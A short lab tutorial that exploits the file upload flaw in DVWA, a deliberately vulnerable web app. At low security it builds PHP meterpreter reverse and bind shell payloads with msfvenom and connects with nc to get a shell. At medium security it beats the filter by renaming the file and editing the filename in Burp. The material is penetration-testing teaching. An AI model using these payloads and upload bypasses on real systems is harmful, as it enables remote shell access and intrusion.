This article is about file upload as a security flaw. In previous articles we’ve setup our lab and made several exploitations against our target.
You can view those articles here.
File Upload — Low Security
$ msfvenom -h
$ msfvenom -l payloads | grep php
View more info:
$ msfvenom -p php/meterpreter/reverse_tcp --list-options
$ msfvenom -p php/meterpreter/reverse_tcp LHOST=192.168.231.107 LPORT=4444 -o php_venom.php
Remove ‘/*’ from beginning of file.
$ msfvenom -p php/bind_php — list-options
$ msfvenom -p php/bind_php LHOST=192.168.231.107 LPORT=4444 -o php_bind.php
remove ‘/*’ from file.
$ nc 192.168.231.110 4444
Got a shell
File Upload — Medium Security
Change DVWA Security to medium and try again.
$ cp php_venom.php php_venom.php.jpg
Try to run:
Let’s hack our file upload. Burp suite with Intercetp on
Return DVWA and upload file again. Go to Burp and change filename:
Then press Forward and get back to the Browser to see a success file upload. Go to hackable/upload and see php_venom.php updated. We’ve bypassed the medium security protection!
Again, with the help of tools we’ve hacked this target. In the next article we’ll keep at it using another vector of attack